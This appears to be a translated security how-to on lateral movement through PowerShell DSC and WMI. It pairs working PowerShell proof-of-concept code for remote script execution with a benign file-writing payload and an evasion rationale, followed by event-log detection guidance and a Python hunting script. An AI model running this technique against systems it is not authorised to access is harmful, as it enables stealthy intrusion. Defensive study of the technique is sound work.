2025-04-03 Update From: SLTechnology News&Howtos
Shulou(Shulou.com)05/31 Report--
This article mainly explains how to perform lateral movement through PowerShell DSC. The content is easy to follow and clearly organised, and we hope it helps resolve your doubts. Let the editor lead you through "how to perform lateral movement through PowerShell DSC".

Brief Introduction to the Lateral Movement Technique

PowerShell Desired State Configuration (DSC) exposes the resources it needs to execute directly through WMI. With the help of the DSC WMI class, remote execution of PowerShell code can be achieved by abusing the built-in Script resource.
This lateral movement technique has the following advantages:
1. PowerShell is executed inside the WMI provider host process (wmiprvse.exe) rather than powershell.exe, which is an advantage from the perspective of evading detection.
2. Every component of the payload is related to WMI.
3. There is no need to configure the DSC service.
Technical Requirements for Lateral Movement

1. The ResourceTest method must exist in the MSFT_DSCLocalConfigurationManager WMI class, which lives in the root/Microsoft/Windows/DesiredStateConfiguration namespace. Note: an attacker could equally call the ResourceGet or ResourceSet methods. PowerShell DSC was introduced in PowerShell v4, so this technique does not apply to all hosts.
2. By default, calling a WMI method remotely requires administrator credentials. WMI security is enforced through DCOM or WSMan security settings, and once a remote connection is established, access is further governed by the security descriptor of the target namespace (root/Microsoft/Windows/DesiredStateConfiguration).
Attack PoC

The first step is to prepare how the payload will be executed. The PowerShell code to be run on the target host must be expressed in MOF format. Here is a sample payload:
```powershell
# MOF document describing a DSC Script resource; the Get/Test/Set scripts
# each append a timestamped line to C:\Windows\Temp\ScriptRun.txt
$MOFContents = @'
instance of MSFT_ScriptResource as $MSFT_ScriptResource1ref
{
    ResourceID = "[Script]ScriptExample";
    GetScript = "\"$(Get-Date): I am being GET\" | Out-File C:\\Windows\\Temp\\ScriptRun.txt -Append; return $True";
    TestScript = "\"$(Get-Date): I am being TESTED\" | Out-File C:\\Windows\\Temp\\ScriptRun.txt -Append; return $True";
    SetScript = "\"$(Get-Date): I am being SET\" | Out-File C:\\Windows\\Temp\\ScriptRun.txt -Append; return $True";
    SourceInfo = "::3::5::Script";
    ModuleName = "PsDesiredStateConfiguration";
    ModuleVersion = "1.0";
    ConfigurationName = "ScriptTest";
};

instance of OMI_ConfigurationDocument
{
    Version = "2.0.0";
    MinimumCompatibleVersion = "1.0.0";
    CompatibleVersionAdditionalProperties = {"Omi_BaseResource:ConfigurationName"};
    Author = "TestUser";
    GenerationDate = "02/26/2018 07:09:21";
    GenerationHost = "TestHost";
    Name = "ScriptTest";
};
'@
```
Here, the only thing that needs to be modified is the PowerShell payload. In our example we call the ResourceTest method, which executes the "TestScript" property above. Note that special characters inside the scripts need to be escaped.

The next step is to convert the MOF text into the binary form that the ResourceTest method requires:
```powershell
# Change this to $False if you want to test the payload locally
$ExecuteRemotely = $True

# Normalise the here-string to plain ASCII bytes, then re-encode as UTF-8
$NormalizedMOFContents = [Text.Encoding]::UTF8.GetString([Text.Encoding]::ASCII.GetBytes($MOFContents))
$NormalizedMOFBytes = [Text.Encoding]::UTF8.GetBytes($NormalizedMOFContents)
# Four-byte little-endian length prefix covering the payload plus the prefix itself
$TotalSize = [BitConverter]::GetBytes($NormalizedMOFContents.Length + 4)

if ($ExecuteRemotely) {
    # Prepend the length of the payload
    [Byte[]] $MOFBytes = $TotalSize + $NormalizedMOFBytes
} else {
    # If executing locally, you do not prepend the payload length
    [Byte[]] $MOFBytes = $NormalizedMOFBytes
}
```
In the example above, if you want to test the payload locally, do not prepend the payload length to the byte array. Once the payload is encoded correctly, all that is left is to execute it on the target host.
```powershell
# Specify the credentials of your target
$Credential = Get-Credential -Credential TempUser
$ComputerName = 'TargetHost'

# Establish a remote WMI session with the target system
$RemoteCIMSession = New-CimSession -ComputerName $ComputerName -Credential $Credential

# Look up the Local Configuration Manager class on the remote host
$LCMClass = Get-CimClass -Namespace root/Microsoft/Windows/DesiredStateConfiguration `
                         -ClassName MSFT_DSCLocalConfigurationManager `
                         -CimSession $RemoteCIMSession

if ($LCMClass -and $LCMClass.CimClassMethods['ResourceTest']) {
    # You may now proceed with lateral movement
    $MethodArgs = @{
        ModuleName       = 'PSDesiredStateConfiguration'
        ResourceType     = 'MSFT_ScriptResource'
        ResourceProperty = $MOFBytes
    }

    $Arguments = @{
        Namespace  = 'root/Microsoft/Windows/DesiredStateConfiguration'
        ClassName  = 'MSFT_DSCLocalConfigurationManager'
        MethodName = 'ResourceTest'
        Arguments  = $MethodArgs
        CimSession = $RemoteCIMSession
    }

    # Invoke the DSC script resource Test method.
    # Successful execution will be indicated by "InDesiredState" returning True and ReturnValue returning 0.
    Invoke-CimMethod @Arguments
} else {
    Write-Warning 'The DSC lateral movement method is not available on the remote system.'
}
```
Note that in the example above I first verified that the remote class and method exist. When using WMI techniques, we recommend that you always verify the presence of the remote class and method before calling them.

Also note that the payload above writes a file to disk on the target host. If you want to retrieve the contents of that file remotely via WMI, you can combine this with [this technique]. Finally, I use the CIM cmdlets here, which were introduced in PowerShell v3; you can use the older WMI cmdlets instead if you need to support PowerShell v2.
Endpoint Detection & Protection

Fortunately, this attack activity leaves traces in the event logs, so it can be detected in a timely manner by monitoring the following events.
Microsoft-Windows-PowerShell/Operational event log, EventID: 53504

The "PowerShell Named Pipe IPC" event records that a PowerShell AppDomain has started. When DSC executes a script resource, this event captures the AppDomain name "DscPsPluginWkr_AppDomain", which is unique to DSC execution. Here is an example of the event:
Windows PowerShell has started an IPC listening thread on process: 6480 in AppDomain: DscPsPluginWkr_AppDomain.

"Windows PowerShell" event log, EventID: 400
In the classic "Windows PowerShell" log, event ID 400 indicates that a new PowerShell engine has started. When a DSC script resource executes, the entry it generates has a distinctive signature: the HostApplication is wmiprvse.exe rather than powershell.exe. Here is an example (engine state transitioned from None to Available):
Details:
    NewEngineState=Available
    PreviousEngineState=None
    SequenceNumber=13
    HostName=Default Host
    HostVersion=5.1.17134.81
    HostId=19cfc50e-8894-4cd5-b0a9-09edd7785b7d
    HostApplication=C:\Windows\system32\wbem\wmiprvse.exe
    EngineVersion=5.1.17134.81
    RunspaceId=12ebba81-9b73-4b1e-975d-e2c16da30906
    PipelineId=
    CommandName=
    CommandType=
    ScriptName=
    CommandPath=
    CommandLine=

Microsoft-Windows-DSC/Operational event log, EventID: 4102
This event is recorded when a DSC resource is invoked on the target host. If the target host is domain-joined, the event includes the SID of the user who invoked the DSC resource as well as the source host. Here is a sample of the event:
Job {893F64B5-ABBF-11E8-B005-D336977413FC} : Operation Invoke-DscResource started by user sid S-1-5-21-3160353621-618008412-2361186285-1001 from computer NULL.
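The following detection logic is an added example, not part of the original article: it runs the three indicators described above over constructed sample event records (modelled on the entries quoted in this section, with two benign events mixed in) and flags a host when all three co-occur, which is the footprint of a script resource executed through the LCM WMI class. The record layout (log name, event ID, message text) is an assumption standing in for whatever your log pipeline emits.

```python
import re

# Constructed sample events (log name, event ID, message), modelled on the three
# entries quoted in the article plus two benign ones; not real captured logs.
SAMPLE_EVENTS = [
    ("Microsoft-Windows-PowerShell/Operational", 53504,
     "Windows PowerShell has started an IPC listening thread on process: 6480 "
     "in AppDomain: DscPsPluginWkr_AppDomain."),
    ("Windows PowerShell", 400,
     "Details:\n\tNewEngineState=Available\n\tPreviousEngineState=None\n"
     "\tHostApplication=C:\\Windows\\system32\\wbem\\wmiprvse.exe\n"
     "\tEngineVersion=5.1.17134.81"),
    ("Microsoft-Windows-DSC/Operational", 4102,
     "Job {893F64B5-ABBF-11E8-B005-D336977413FC} : Operation Invoke-DscResource "
     "started by user sid S-1-5-21-3160353621-618008412-2361186285-1001 "
     "from computer NULL."),
    ("Windows PowerShell", 400,   # benign: an interactive console host
     "Details:\n\tNewEngineState=Available\n\tHostApplication="
     "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"),
    ("Microsoft-Windows-PowerShell/Operational", 53504,   # benign: other AppDomain
     "Windows PowerShell has started an IPC listening thread on process: 1234 "
     "in AppDomain: DefaultAppDomain."),
]

def classify_event(log, event_id, message):
    """Return an indicator name if the event matches one of the article's three
    DSC script-resource signals, otherwise None."""
    if log == "Microsoft-Windows-PowerShell/Operational" and event_id == 53504:
        if "DscPsPluginWkr_AppDomain" in message:
            return "dsc_worker_appdomain"
    elif log == "Windows PowerShell" and event_id == 400:
        m = re.search(r"HostApplication=(.+)", message)
        if m and m.group(1).strip().lower().endswith("\\wbem\\wmiprvse.exe"):
            return "engine_hosted_by_wmiprvse"
    elif log == "Microsoft-Windows-DSC/Operational" and event_id == 4102:
        if "Invoke-DscResource" in message:
            return "invoke_dscresource"
    return None

def source_of_4102(message):
    """Pull the invoking user SID and source computer out of a DSC 4102 message."""
    m = re.search(r"user sid (S-1-5-[\d-]+) from computer (\S+?)\.?$", message)
    return (m.group(1), m.group(2)) if m else None

def hunt(events):
    """Classify every event; all_three is True only when the AppDomain, the
    wmiprvse-hosted engine and the Invoke-DscResource job are all present."""
    found = {}
    for log, event_id, message in events:
        label = classify_event(log, event_id, message)
        if label:
            found[label] = source_of_4102(message) if label == "invoke_dscresource" else True
    return {"indicators": found, "all_three": len(found) == 3}
```

On a real host, feed hunt() with records read from the three logs named above; the 4102 source fields give the user and computer to pivot on in the investigation.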
© 2024 shulou.com SLNews company. All rights reserved.